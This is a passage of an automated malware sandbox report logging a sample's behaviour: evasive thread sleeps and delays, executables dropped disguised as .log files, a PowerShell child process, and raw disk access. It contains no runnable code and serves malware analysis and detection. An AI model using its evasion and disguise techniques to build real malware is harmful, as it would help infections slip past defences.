Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 599281
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 599000
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 598578
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 598297
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 3600000
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 598047
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 596172
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 595234
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 594859
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 594515
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 594319
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 594140
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 593832
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 593523
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 589297
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 589047
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 588625
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 588265
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 587984
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 587593
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 587000
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 586656
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 586172
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 585949
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 585687
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 585437
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 585062
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 584780
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 584297
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 583968
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 583656
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 583312
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 582922
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 582577
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 582234
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 581922
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 581730
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 581591
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 581390
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 581218
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 581018
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 579265
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 579047
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 300000
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 578875
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 578312
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 578130
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 577984
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 577872
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 577748
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 577621
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 577449
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 577328
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 577156
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 577017
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 576863
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 576718
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 576578
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 576462
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 576353
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 574718
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 574359
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 573713
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 573578
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 573450
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 573338
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 573230
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 573125
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 573015
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 572905
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 572794
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 572650
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 572546
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 572421
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 572297
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 572179
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 572019
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 571890
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 571781
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 571587
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 570031
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 569697
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 569318
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 569031
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 568906
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 568788
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 568686
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 568577
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 568466
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 568359
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 568250

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\portintosvc\driverInto.exe	Window / User API: threadDelayed 4450	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Window / User API: threadDelayed 1129	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1944	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1948	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2453
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2397
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1698
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2078
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Window / User API: threadDelayed 7091
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Window / User API: threadDelayed 2267

Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\nntxgNlb.log	Jump to dropped file
Source: C:\portintosvc\driverInto.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\cvopZsny.log	Jump to dropped file
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\fJkHwTWu.log	Jump to dropped file
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\VaRrMrQM.log	Jump to dropped file
Source: C:\portintosvc\driverInto.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\uCFUtfTN.log	Jump to dropped file
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\TQvqMYlM.log	Jump to dropped file
Source: C:\portintosvc\driverInto.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\SHKzphsQ.log	Jump to dropped file
Source: C:\portintosvc\driverInto.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\DtICHrzA.log	Jump to dropped file
Source: C:\portintosvc\driverInto.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\EqkKdrOv.log	Jump to dropped file
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\mqRpKNWg.log	Jump to dropped file

Source: C:\Users\user\Desktop\Vqzx4PFehn.exe

Evasive API call chain: GetLocalTime,DecisionNodes

graph_0-23771

Source: C:\portintosvc\driverInto.exe TID: 1620	Thread sleep time: -12912720851596678s >= -30000s	Jump to behavior
Source: C:\portintosvc\driverInto.exe TID: 1620	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\portintosvc\driverInto.exe TID: 1620	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\portintosvc\driverInto.exe TID: 1620	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\portintosvc\driverInto.exe TID: 1620	Thread sleep time: -599641s >= -30000s	Jump to behavior
Source: C:\portintosvc\driverInto.exe TID: 1620	Thread sleep time: -599516s >= -30000s	Jump to behavior
Source: C:\portintosvc\driverInto.exe TID: 1620	Thread sleep time: -599406s >= -30000s	Jump to behavior
Source: C:\portintosvc\driverInto.exe TID: 1620	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\portintosvc\driverInto.exe TID: 1620	Thread sleep time: -99874s >= -30000s	Jump to behavior
Source: C:\portintosvc\driverInto.exe TID: 1620	Thread sleep time: -99765s >= -30000s	Jump to behavior
Source: C:\portintosvc\driverInto.exe TID: 1620	Thread sleep time: -99656s >= -30000s	Jump to behavior
Source: C:\portintosvc\driverInto.exe TID: 1620	Thread sleep time: -99546s >= -30000s	Jump to behavior
Source: C:\portintosvc\driverInto.exe TID: 1620	Thread sleep time: -99437s >= -30000s	Jump to behavior
Source: C:\portintosvc\driverInto.exe TID: 1620	Thread sleep time: -99327s >= -30000s	Jump to behavior
Source: C:\portintosvc\driverInto.exe TID: 1620	Thread sleep time: -99218s >= -30000s	Jump to behavior
Source: C:\portintosvc\driverInto.exe TID: 1620	Thread sleep time: -99109s >= -30000s	Jump to behavior
Source: C:\portintosvc\driverInto.exe TID: 1620	Thread sleep time: -99000s >= -30000s	Jump to behavior
Source: C:\portintosvc\driverInto.exe TID: 1620	Thread sleep time: -98890s >= -30000s	Jump to behavior
Source: C:\portintosvc\driverInto.exe TID: 1620	Thread sleep time: -98781s >= -30000s	Jump to behavior
Source: C:\portintosvc\driverInto.exe TID: 1620	Thread sleep time: -98672s >= -30000s	Jump to behavior
Source: C:\portintosvc\driverInto.exe TID: 1620	Thread sleep time: -98562s >= -30000s	Jump to behavior
Source: C:\portintosvc\driverInto.exe TID: 1620	Thread sleep time: -98453s >= -30000s	Jump to behavior
Source: C:\portintosvc\driverInto.exe TID: 1620	Thread sleep time: -98343s >= -30000s	Jump to behavior
Source: C:\portintosvc\driverInto.exe TID: 1620	Thread sleep time: -98234s >= -30000s	Jump to behavior
Source: C:\portintosvc\driverInto.exe TID: 1620	Thread sleep time: -98125s >= -30000s	Jump to behavior
Source: C:\portintosvc\driverInto.exe TID: 1620	Thread sleep time: -98015s >= -30000s	Jump to behavior
Source: C:\portintosvc\driverInto.exe TID: 1620	Thread sleep time: -597282s >= -30000s	Jump to behavior
Source: C:\portintosvc\driverInto.exe TID: 1620	Thread sleep time: -597125s >= -30000s	Jump to behavior
Source: C:\portintosvc\driverInto.exe TID: 1620	Thread sleep time: -596926s >= -30000s	Jump to behavior
Source: C:\portintosvc\driverInto.exe TID: 1620	Thread sleep time: -594834s >= -30000s	Jump to behavior
Source: C:\portintosvc\driverInto.exe TID: 1620	Thread sleep time: -594672s >= -30000s	Jump to behavior
Source: C:\portintosvc\driverInto.exe TID: 5852	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\portintosvc\driverInto.exe TID: 6148	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7292	Thread sleep count: 1944 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7624	Thread sleep time: -9223372036854770s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7524	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7316	Thread sleep count: 1948 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7632	Thread sleep time: -10145709240540247s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7536	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7352	Thread sleep count: 2453 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7636	Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7556	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7344	Thread sleep count: 2397 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7372	Thread sleep count: 340 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7620	Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7544	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7448	Thread sleep count: 1698 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7640	Thread sleep time: -12912720851596678s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7564	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7456	Thread sleep count: 2078 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7628	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7528	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8068	Thread sleep time: -30000s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -19369081277395017s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -600000s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -599843s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -599705s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -599281s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -599000s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -598578s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -598297s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8152	Thread sleep time: -7200000s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -598047s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -596172s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -595234s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -594859s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -594515s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -594319s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -594140s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -593832s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -593523s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -589297s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -589047s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -588625s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -588265s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -587984s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -587593s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -587000s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -586656s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -586172s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -585949s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -585687s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -585437s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -585062s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -584780s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -584297s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -583968s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -583656s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -583312s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -582922s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -582577s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -582234s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -581922s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -581730s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -581591s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -581390s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -581218s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -581018s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -579265s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -579047s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8152	Thread sleep time: -600000s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -578875s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -578312s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -578130s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -577984s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -577872s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -577748s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -577621s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -577449s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -577328s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -577156s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -577017s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -576863s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -576718s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -576578s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -576462s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -576353s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -574718s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -574359s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -573713s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -573578s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -573450s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -573338s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -573230s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -573125s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -573015s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -572905s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -572794s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -572650s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -572546s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -572421s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -572297s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -572179s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -572019s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -571890s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -571781s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -571587s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -570031s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -569697s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -569318s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -569031s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -568906s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -568788s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -568686s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -568577s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -568466s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -568359s >= -30000s
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe TID: 8176	Thread sleep time: -568250s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6652	Thread sleep time: -30000s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed

Source: C:\portintosvc\driverInto.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Code function: 0_2_0100A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,		0_2_0100A69B
